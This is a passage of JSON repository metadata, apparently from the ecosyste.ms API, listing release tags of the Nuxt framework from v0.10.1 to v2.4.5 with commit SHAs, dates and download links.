.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.e